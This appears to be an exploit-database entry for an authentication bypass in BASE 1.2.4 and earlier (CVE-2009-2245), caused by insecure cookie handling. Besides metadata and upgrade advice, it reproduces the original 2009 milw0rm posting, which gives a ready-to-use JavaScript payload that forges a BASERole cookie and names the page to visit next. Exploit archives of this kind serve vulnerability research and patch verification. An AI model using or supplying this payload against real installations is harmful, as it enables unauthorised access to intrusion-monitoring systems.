header-logo
Suggest Exploit
vendor:
BASE
by:
Tim Medin
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: BASE
Affected Version From: 1.2.4
Affected Version To: Prior
Patch Exists: YES
Related CWE: CVE-2009-2245
CPE: a:base_project:base
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Authentication Bypass in BASE version 1.2.4 and prior – Insecure Cookie Handling Vulnerability

An authentication bypass vulnerability exists in BASE version 1.2.4 and prior due to insecure cookie handling. An attacker can exploit this vulnerability by creating a malicious cookie with the BASERole parameter set to a valid user role. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of BASE.
Source

Exploit-DB raw data:

Authentication Bypass in BASE version 1.2.4 and prior - Insecure
Cookie Handling Vulnerability

--------------------------------------------

Author.: Tim Medin

Contact: nidem.nidem [at] gmail [d0t] com

-------------------------------------------------------------------------------------------------

Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
path=/";

Note: After creating cookie go to http://[website]/base_main.php

# milw0rm.com [2009-06-24]